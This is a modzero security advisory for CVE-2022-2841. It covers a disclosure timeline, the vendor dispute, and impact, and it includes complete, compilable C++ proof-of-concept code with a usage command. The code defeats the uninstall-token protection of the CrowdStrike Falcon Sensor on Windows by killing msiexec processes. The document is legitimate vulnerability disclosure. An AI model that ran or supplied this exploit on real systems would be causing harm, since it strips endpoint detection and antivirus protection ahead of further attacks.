[MZ-22-02] CrowdStrike FalconSensor

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387

------------------------------------------------------------------v1-
modzero Security Advisory [MZ-22-02]:
Uninstall Protection Bypass for CrowdStrike Falcon Sensor
---------------------------------------------------------------------

CrowdStrike Falcon is a cloud-powered endpoint detection and response
(EDR) and antivirus (AV)  solution. On each end-device  a lightweight
managed  sensor  is  deployed  and  makes  use  of  the   cloud-based
capabilities.  The  sensor  can   be  configured  with  a   uninstall
protection.  It  prevents the  uninstallation  of CrowdStrike  Falcon
sensor on the end-device without a one-time generated token.

Exploiting this vulnerability allows  an attacker with administrative
privileges to  bypass the token  check on Windows end-devices  and to
uninstall the  sensor from  the device without  proper authorization,
effectively removing the device's EDR and AV protection.

---------------------------------------------------------------------
1. Timeline
---------------------------------------------------------------------

2022/04    - Found   vulnerability  in   CrowdStrike  Falcon   Sensor
             (6.31.14505.0)
             
2022/06/04 - modzero  asked  for   security  contact  @  CrowdStrike,
             because their "report a  security bug" page only refered
             to the hackerone Bug Bounty program.
             
2022/06/06 - CS  answered   that  modzero   can  use   the  hackerone
             submission page, or  send an E-Mail to  their support at
             support@crowdstrike.com.
             
2022/06/06 - modzero  asked   if  it   is  okay  to   send  sensitive
             information  about  0day  vulnerabilities  to  support@.
             modzero also told  CS that we are not  willing to accept
             terms & conditions  of hackerone, which is  why we asked
             for a direct security contact.
             
2022/06/06 - CS offered  to enroll  modzero in  a private  bug bounty
             program at  hackerone, under the conditions  that we are
             willing to sign a mutual non-disclosure agreement.
             
2022/06/07 - to  prevent further  misunderstandings, modzero  told CS
             again, that:

             * We would like to submit a security related bug.
             * We don't want to participate in any bug bounty
               programs.
             * We are not willing to sign any NDA because WE are the
               ones, providing information to CS.
             * We are not willing to accept any sort of terms and
               conditions that are out of scope of well known hacker
               ethics.
             * We only want to get a reliable security contact on
               their side.

             Aditionally,  modzero  sent  a  link  to  their  current
             vulnerability disclosure policy.

2022/06/07 - CS told us to send the report to bugs@ for review.
             
2022/06/13 - CS asked for the report.
             
2022/06/13 - modzero told CS  that we need a little bit  more time to
             finish and double check everything before submitting.
             
2022/06/29 - modzero sent Security Advisory (draft), Proof of Concept
             exploit sourcecode, executable and a Screencast video of
             the PoC to CS.
             
2022/06/29 - CS  told  us,  that  we   were  testing  using  only  an
             unsupported  version of  the Falcon  Sensor. CS  told us
             about the  error message and  that they are not  able to
             reproduce.
             
2022/07/05 - modzero told  CS that the  error message can  be ignored
             and refered  to the  PoC screencast video. We also asked
             for a recent (14-day trial)  version of Falcon Sensor to
             provide reliable information if  the most recent version
             is still vulnerable or not.
             
2022/07/05 - CS answered: "We  do not provide trial  licenses as part
             of this  process, however having  tested the PoC  on our
             end with  a modern sensor this  does not appear to  be a
             valid issue."
             
2022/07/05 - modzero  announced publishing  the advisory  and exploit
             code by end  of week, asking if the quote  of CS "Having
             tested the PoC on our end with a modern sensor this does
             not  appear to  be a  valid issue"  can be  used in  our
             report.
             
2022/07/06 - CS asking for a  meeting between modzero's Sr Leadership
             and CS to  discuss next steps related to  the bug bounty
             disclosure.
             
2022/07/07 - modzero, again,  told CS, that we  are not participating
             in any bug  bounty program and that there is  no need to
             discuss NDAs or bug bounty programs.
             
2022/08/12 - modzero managed to acquire a recent version (6.42.15610)
             of CrowdStrike  Falcon and verified, that  the attack is
             still  possible. Furthermore,  modzero figured  out that
             the  vulnerability  (that  was rejected  by  CrowdStrike
             first) has  been silently fixed:  The PoC that  has been
             sent  to  CrowdStrike  was  flagged  as  malicious.  The
             msiexec  call of  the  deinstaller was  also flagged  as
             malicious.  Both "countermeasures"  can be  circumvented
             easily, we updated the exploit accordingly.
             
2022/08/22 - modzero   publishes   Security  Advisory   and   exploit
             code,  because  CrowdStrike  was  unwilling  to  set  up
             a  cooperative  information  exchange outside  of  their
             NDA-ridden bug bounty program to discuss vulnerabilities
             in their products.

---------------------------------------------------------------------
2. Summary
---------------------------------------------------------------------

Vendor: CrowdStrike 
Homepage: https://www.crowdstrike.com/endpoint-security-products/falcon-endpoint-protection-enterprise/

Error Class: 

* CWE-691: Insufficient Control Flow Management 
(https://cwe.mitre.org/data/definitions/691.html)

The  code  does  not  sufficiently manage  its  control  flow  during
execution,  creating conditions  in  which the  control  flow can  be
modified in unexpected ways.

Products known to be affected: 

* CrowdStrike Falcon (6.31.14505.0)
* CrowdStrike Falcon (6.42.15610)

Please note: Other versions might be affected as
well, but were not tested by modzero.

CVE-ID: CVE-2022-2841
Severity: Medium/4.4 (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)
Vendor: CrowdStrike
Product: CrowdStrike Falcon
Version: 6.42.15610
Attack type: Local
Affected Components: Uninstall Protection

---------------------------------------------------------------------
3. Details
---------------------------------------------------------------------

CrowdStrike  Falcon is  a cloud-native  antivirus (AV)  and  endpoint
detection and response (EDR) solution for end-devices. A sensor agent
is deployed on each end-device,  which are then managed and connected
with a cloud monitoring system.

The "Uninstall Protection"  feature allows to  lock down devices  and
prevent  device users,  including administrators,  from removing  the
sensor agent without a one-time, device-specific maintenance token.

During  a  security  analysis modzero  was  required  to uninstall  a
CrowdStrike  Falcon  Sensor  installation  on  a  Windows workstation
without having access to the maintenance token.

After analysing the  software removal procedure,  it was possible  to
develop  an  automated  proof of  concept  tool,  which corrupts  the
CrowdStrike Falcon Sensor removal process. As a result, the procedure
ignores the maintenance token check.

This allows an  attacker with administrator  rights to uninstall  and
stop  the CrowdStrike  Falcon Sensor  and its  corresponding  Windows
services without a valid token.

---------------------------------------------------------------------
4. Impact
---------------------------------------------------------------------

An attacker with administrative access  to a machine, can bypass  the
"Uninstall Protection" of the CrowdStrike Falcon Sensor.

The   attack   removes   the   software,   leaving   the  CrowdStrike
administrator  in  the  dark  about  potential  attacks  on  the  now
unprotected endpoint.

This is particularly  undesirable, given that this is a  cloud-native
service where customers expect alerts for security-related actions.

---------------------------------------------------------------------
5. Proof of Concept
---------------------------------------------------------------------

The following proof of concept code allows an administrator to remove
the CrowdStrike Falcon Sensor without maintenance token: 

//
// CrowdStrike Falcon Sensor
// De-Installation Auth-Bypass Proof-of-Concept
//
// Falcon Sensor is installed with an uninstall protection, to prevent unauthorized administrators
// from removing Falcon Sensor. The following Proof-of-Concept exploit allows to bypass the
// uninstall protection (token check). This can be used to remove the endpoint's EDR and AV protection.
//
// References:
// - modzero MZ-22-02 Security Advisory
// - CVE: CVE-2022-2841
//
// Version: 0.3
// Secrecy: CONFIDENTIAL
// Copyright 2022, modzero AG, Wartstr. 20, 8400 Winterthur, Switzerland
//
// Usage example:
//   .\CSFalconTokenBypass.exe 'C:\ProgramData\Package Cache\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}v6.XX.XX.0\CsAgent.LionLanner.msi'
//

#pragma once
#define _CRT_SECURE_NO_WARNINGS

#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>
#include <list>
#include <iostream>

std::list<int> g_msiexec_instances = {};
int g_msiexec_instance_count = 0;

void CheckProcess(DWORD process_id)
{
    TCHAR process_name[MAX_PATH] = { 0 };
    HANDLE h_proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);

    if (nullptr != h_proc) {

        HMODULE h_mod = 0;
        DWORD c_need = 0;

        if (EnumProcessModules(h_proc, &h_mod, sizeof(h_mod), &c_need)) {

            GetModuleBaseName(h_proc, h_mod, process_name,
                sizeof(process_name) / sizeof(char));
        }

    } else {
        return;
    }
    if (wcsstr(_wcslwr(process_name), __T("msiexec"))) {

        bool already_found = (
            std::find(
                g_msiexec_instances.begin(),
                g_msiexec_instances.end(),
                process_id) != g_msiexec_instances.end()
            );

        if (!already_found) {

            g_msiexec_instance_count++;
            std::cout << "[+] Installer spawned process: " << process_id << std::endl;

            g_msiexec_instances.push_front(process_id);

            // If it's the third process, we try to kill it to produce open MSIHandles.
            // This will break the uninstaller token check.

            if (g_msiexec_instance_count == 4 || g_msiexec_instance_count == 5) {

                std::cout << "[+] Killing process: " << process_id << std::endl;

                if (!TerminateProcess(h_proc, 123)) {
                    std::cout << "[!] Failed to kill process with PID " << process_id << ": " << GetLastError() << std::endl;
                }

                if (g_msiexec_instance_count == 5) {
                    std::cout << "[+] Uninstall Protection should be bypassed." << std::endl;
                    exit(0);
                }
            }
        }
    }

    CloseHandle(h_proc);
}

int main(int argc, char* argv[])
{
    DWORD proc_ids[1024] = { 0 };
    DWORD c_need = 0;
    DWORD c_procs = 0;
    DWORD i = 0;

    if (argc != 2) {
        std::cout << "Usage:" << std::endl << argv[0] << " PATH_TO_CsAgent.LionLanner.msi" << std::endl;
        return 1;
    }

    // increase priority to realtime and start uninstall
    SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
    
    std::string path = std::string(argv[1]);
    unsigned first = path.find("{");
    unsigned last = path.find_last_of("}");
    std::string guid = path.substr (first,last-first+1);
    std::string cmd = "start msiexec /x " + guid;
    
    system(cmd.c_str());

    // now listen for processes popping up
    while (1) {

        if (!EnumProcesses(proc_ids, sizeof(proc_ids), &c_need)) {
            std::cout << "[-] Failed to read processes." << std::endl;
            return 1;
        }

        c_procs = c_need / sizeof(DWORD);

        // Check every process ID
        for (i = 0; i < c_procs; i++) {

            if (proc_ids[i] != 0) {
                CheckProcess(proc_ids[i]);
            }
        }
    }

    return 0;
}

To use the Proof  of Concept, the code  must be compiled with  Visual
Studio,    and    be    run    as    administrator,    pointing    to
`CsAgent.LionLanner.msi` as argument e.g.:

.\CSFalconTokenBypass.exe 'C:\ProgramData\Package Cache\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}v6.XX.XX.0\CsAgent.LionLanner.msi'

After executing it, the software removal procedure starts and a popup
with an error message, that the  token is invalid will show up. After
closing the  popup,  the uninstallation  continues and removes
all components.

---------------------------------------------------------------------
6. Fix
---------------------------------------------------------------------

- n/a

---------------------------------------------------------------------
7. Credits
---------------------------------------------------------------------

  * Pascal Zenker (parzel) of modzero
  * Max Moser (mmo) of modzero

---------------------------------------------------------------------
8. About modzero
---------------------------------------------------------------------
 
The independent  Swiss-German  company  modzero assists  clients with
security analysis  in the complex  areas of computer  technology. The
focus  lies on  highly  detailed  technical  analysis  of   concepts,
software  and  hardware  components as  well as  the  development  of
individual  solutions.  Colleagues  at  modzero work  exclusively  in
practical, highly  technical computer-security  areas and can draw on
decades of  experience  in various  platforms,  system concepts,  and
designs.

https://www.modzero.com contact@modzero.com

modzero follows coordinated disclosure practices described here:

https://www.modzero.com/static/modzero_Disclosure_Policy.pdf.

This policy  should  have been  sent to  the vendor  along with  this
security advisory.

---------------------------------------------------------------------
9. Disclaimer
---------------------------------------------------------------------
 
The information  in the advisory  is believed  to be accurate  at the
time of publishing based  on currently available  information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no  warranties  concerning  this  information. Neither  the
author  nor the  publisher  accepts  any liability  for  any  direct,
indirect, or  consequential  loss or  damage  arising from  using, or
reliance on, this information.